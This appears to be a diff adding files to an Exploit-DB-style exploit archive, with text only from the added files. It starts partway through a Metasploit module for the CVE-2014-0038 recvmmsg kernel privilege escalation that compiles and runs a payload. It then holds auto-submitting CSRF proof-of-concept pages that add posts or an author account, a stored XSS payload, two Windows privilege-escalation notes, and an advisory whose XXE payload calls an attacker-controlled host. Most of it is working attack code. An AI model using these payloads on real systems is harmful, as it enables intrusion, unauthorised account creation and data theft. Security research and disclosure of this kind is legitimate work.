msgs[0].msg_hdr.msg_iovlen = 1;
for(i=0;i < 3 ;i++) {
udp(i);
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
if(!retval) {
fprintf(stderr,"\nrecvmmsg() failed\n");
}
}
close(sockfd);
fprintf(stderr,"\n");
trigger();
}
}
filename = rand_text_alphanumeric(8)
executable_path = "#{datastore['WritableDir']}/#{filename}"
payloadname = rand_text_alphanumeric(8)
payload_path = "#{datastore['WritableDir']}/#{payloadname}"
def has_prereqs?()
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
else
print_error('gcc is not installed. Compiling will fail.')
end
return gcc.include?('gcc')
end
compile = false
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
if has_prereqs?()
compile = true
vprint_status('Live compiling exploit on system')
else
vprint_status('Dropping pre-compiled exploit on system')
end
end
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
def upload_and_chmod(fname,fcontent)
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
rm_f fname
write_file(fname, fcontent)
cmd_exec("chmod +x #{fname}")
register_file_for_cleanup(fname)
end
if compile
recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
"system(\"#{payload_path}\");")
upload_and_chmod("#{executable_path}.c", recvmmsg)
vprint_status("Compiling #{executable_path}.c")
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
register_file_for_cleanup(executable_path)
else
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
fd = ::File.open( path, "rb")
recvmmsg = fd.read(fd.stat.size)
fd.close
upload_and_chmod(executable_path, recvmmsg)
# overwrite with the hardcoded variable names in the compiled versions
payload_filename = 'a0RwAacU'
payload_path = "/tmp/#{payload_filename}"
end
upload_and_chmod(payload_path, generate_payload_exe)
stime = Time.now
vprint_status("Exploiting... May take 13min. Start time: #{stime}")
output = cmd_exec(executable_path)
output.each_line { |line| vprint_status(line.chomp) }
end
end

94
platforms/php/webapps/40493.html Executable file
View file

@ -0,0 +1,94 @@
# Exploit Title : Spacemarc News - Cross-Site Request
Forgery ( Add New Post)
# Author : Besim
# Google Dork : -
# Date : 10/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.spacemarc.it
# Software link :
http://www.hotscripts.com/listings/jump/download/107255
*########################### CSRF PoC ###############################*
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://site_name/news/admin/inserisci.php", true);
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;boundary=---------------------------7815509202030471153167006625");
xhr.withCredentials = true;
var body ="-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"titolo\"\r\n" +
"\r\n" +
"MavilerTester\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"im\"\r\n" +
"\r\n" +
"IM\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"size\"\r\n" +
"\r\n" +
"Normale\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"color\"\r\n" +
"\r\n" +
"Color\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"helpbox\"\r\n" +
"\r\n" +
"[u]text[/u]\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"testo\"\r\n" +
"\r\n" +
"tester\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"immagine\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"userfile\";filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"letture\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"categoria\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"abilita_commenti\"\r\n" +
"\r\n" +
"on\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"notifica_commenti\"\r\n"+
"\r\n" +
"on\r\n" +
"-----------------------------7815509202030471153167006625\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Inserisci\r\n" +
"-----------------------------7815509202030471153167006625--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
*####################################################################*

38
platforms/php/webapps/40495.html Executable file
View file

@ -0,0 +1,38 @@
<!--
# Exploit Title : *BirdBlog 1.4.0* *- *Cross-Site Request Forgery (*Add New Post*)
# Author : *Besim*
# Google Dork : -
# Date : 11/10/2016
# Type : *webapps*
# Platform : *PHP*
# Software link: http://www.hotscripts.com/listings/jump/download/49011
*########################### CSRF PoC ###############################*
-->
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/path/admin/entries.php?a=post" method="POST">
<input type="hidden" name="title" value="Exploit&#45;DB" />
<input type="hidden" name="category" value="1" />
<input type="hidden" name="music" value="rockrock" />
<input type="hidden" name="mood" value="rock" />
<input type="hidden" name="moodicon" value="1" />
<input type="hidden" name="entry" value="tester" />
<input type="hidden" name="excerpt" value="tester" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="parseurls" value="1" />
<input type="hidden" name="parseemoticons" value="1" />
<input type="hidden" name="parsebbcode" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<!--
*####################################################################*
-->

83
platforms/php/webapps/40496.html Executable file
View file

@ -0,0 +1,83 @@
<!--
# Exploit Title : PHP Enter 4.2.7 - Cross-Site Request Forgery (Add New Post)
# Author : Besim
# Google Dork : -
# Date : 11/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.phpenter.net
# Software link : http://www.hotscripts.com/listings/jump/download/150217
########################### CSRF PoC ###############################
-->
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://site_name/path/addnews.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------4485886114928592041224662482");
xhr.withCredentials = true;
var body = "-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"univer\"\r\n" +
"\r\n" +
"2016074155\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"idblog\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"usercc\"\r\n" +
"\r\n" +
"root\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"editor\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"badress\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"bname\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"summary\"\r\n" +
"\r\n" +
"Test\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"main\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"amess\"\r\n" +
"\r\n" +
"\x3cp\x3eTestttt\x3c/p\x3e\r\n" +
"-----------------------------4485886114928592041224662482\r\n" +
"Content-Disposition: form-data; name=\"query\"\r\n" +
"\r\n" +
"Submit\r\n" +
"-----------------------------4485886114928592041224662482--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

26
platforms/php/webapps/40505.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
Site Scripting
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
Description :
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
Stored XSS Payload ( Comments ): *
# Vulnerable URL :
http://site_name/path/index.php?page=posts&post_id= - Post comment section
# Vuln. Parameter : comment_user_name
############ POST DATA ############
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
your comment
############ ######################

155
platforms/php/webapps/40506.html Executable file
View file

@ -0,0 +1,155 @@
# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
########################### CSRF PoC ###############################
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "
http://site_name/path/index.php?admin=authors_management", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------25472311920733601781889948655");
xhr.withCredentials = true;
var body =
"-----------------------------25472311920733601781889948655\r\n" +
"Content-Disposition: form-data; name=\"mg_action\"\r\n" +
"\r\n" +
"create\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_rid\"\r\n" +
"\r\n" +
"-1\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_sorting_fields\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_sorting_types\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_page\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation_type\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_operation_field\"\r\n"
+
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_search_status\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"mg_language_id\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"show_about_me\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"account_type\"\r\n" +
"\r\n" +
"author\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"last_login\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
"\r\n" +
"Mehmet\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
"\r\n" +
"mersin\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"mehmet@yopmail.com\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"user_name\"\r\n" +
"\r\n" +
"Zer0\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"mehmet\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"avatar\";
filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"about_me\"\r\n" +
"\r\n" +
"denemddendemdendjendk\r\n" +
"-----------------------------25472311920733601781889948655\r\n"
+
"Content-Disposition: form-data; name=\"is_active\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------25472311920733601781889948655--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>
####################################################################

29
platforms/windows/local/40494.txt Executable file
View file

@ -0,0 +1,29 @@
Minecraft Launcher: https://minecraft.net
Version: 1.6.61
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Insecure File Permissions Local Privilege Escalation
Minecraft's launcher (minecraftLauncher.exe) suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'F' flag (Full) for 'Users' group, making the entire directory
'Minecraft' and its files and sub-dirs world-writable.
This would allow an attacker the ability to inject code or replace the MinecraftLauncher
executable and have it run in the context of the system.
PoC:
C:\Program Files (x86)\Minecraft>icacls MinecraftLauncher.exe
MinecraftLauncher.exe BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
PENTEST\ross.marks:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files

29
platforms/windows/local/40497.txt Executable file
View file

@ -0,0 +1,29 @@
#########################################################################
# Exploit Title: sheed AntiVirus Unquoted Service Path Privilege Escalation
# Date: 11/10/2016
# Author: Amir.ght
# Vendor Homepage: http://sheedantivirus.ir/
# Software Link:http://dl.sheedantivirus.ir/setup.exe
#version : 2.3 (Latest)
# Tested on: Windows 7
##########################################################################
sheed AntiVirus installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc ShavProt
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ShavProt
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ShavProt
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

140
platforms/xml/webapps/40501.txt Executable file
View file

@ -0,0 +1,140 @@
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
=======================================================================
title: XML External Entity Injection (XXE)
product: RSA Enterprise Compromise Assessment Tool (ECAT)
vulnerable version: 4.1.0.1
fixed version: 4.1.2.0
CVE Number: -
impact: Medium
homepage: https://www.rsa.com
found: 2016-04-27
by: Samandeep Singh (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber threats.
With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities; and
ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about
Business recommendation:
------------------------
By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using RSA ECAT client and thus obtain sensitive
information from the system. It is also possible to scan ports of the internal
hosts and cause DoS on the affected host.
SEC Consult recommends not to use the product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection
The used XML parser is resolving external XML entities which allows attackers
to read files and send requests to systems on the internal network (e.g port
scanning). The vulnerability can be exploited by tricking the user of
the application to import a whitelisting file with malicious XML code.
Proof of concept:
-----------------
1) XML External Entity Injection (XXE)
The RSA ECAT client allows users to import whitelisting files in XML format.
By tricking the user to import an XML file with malicious XML code to the
application, it's possible to exploit an XXE vulnerability within the application.
For example by importing the following XML code, arbitrary files can be read
from the client's system. The following code generates the connection request
from the client system to attacker system.
===============================================================================
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>
===============================================================================
IP:port = IP address and port where the attacker is listening for connections
Furthermore some files can be exfiltrated to remote servers via the
techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
Vulnerable / tested versions:
-----------------------------
The XXE vulnerability has been verified to exist in the RSA ECAT software
version 4.1.0.1 which was the latest version available at the time of
discovery.
Vendor contact timeline:
------------------------
2016-04-28: Vulnerabilities reported to the vendor by 3rd party
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
2016-10-11: SEC Consult releases security advisory
Solution:
---------
Update to version 4.1.2.0
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF S. Singh / @2016